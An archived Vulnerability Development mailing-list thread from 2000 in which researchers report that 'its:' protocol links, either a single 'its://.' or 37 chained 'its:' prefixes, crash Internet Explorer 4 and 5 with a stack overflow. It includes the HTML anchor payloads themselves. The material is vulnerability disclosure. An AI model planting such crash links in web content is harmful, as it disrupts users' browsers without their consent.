Vulnerability Development mailing list archives

Re: its: recursion


From: mashuk () PACBELL NET (Alex)
Date: Wed, 9 Feb 2000 20:30:29 -0800


37 of "its:" caused famous Dr.Watson to show up with IEXPLORE.exe
 Exception: stack overflow (0xc00000fd), Address:0x702ad96b
IE5 on NT SP5

-----Original Message-----
From:   Sean Burford [SMTP:slide () TELLURIAN COM AU]
Sent:   Wednesday, February 09, 2000 7:04 PM
To:     VULN-DEV () SECURITYFOCUS COM
Subject:        Re: its: recursion

A single its://. href is enough to crash ie 5.00.2919.63071C for me.  I'm
running NT 4 SP6a.

Example: <A HREF="its://.">do not click me</A>

Put 37 concatenated "its:" strings as a target url and IE4 crashes
when trying to handle that url.. No I don't know if you wanted
to know this.
<a

href="its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:it
s:its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:it
s:its:its:.">do
not click me</a>


Current thread: